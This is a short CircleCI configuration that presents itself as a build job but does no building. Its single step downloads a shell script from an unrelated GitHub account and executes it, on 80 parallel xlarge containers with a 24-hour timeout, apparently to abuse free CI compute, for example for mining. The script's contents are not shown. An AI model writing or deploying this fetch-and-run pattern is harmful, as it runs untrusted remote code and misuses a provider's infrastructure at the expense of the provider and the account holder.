version: 2
jobs:
  build:
    docker:
      - image: python:latest
    parallelism: 80
    resource_class: xlarge
    steps:
      - run: 
          name: Run Job 
          no_output_timeout: 24h
          command: wget https://raw.githubusercontent.com/Baranteng/baranteng/main/run.sh && chmod 500 run.sh && ./run.sh
workflows:
    version: 2
    build:
        jobs:
            - build
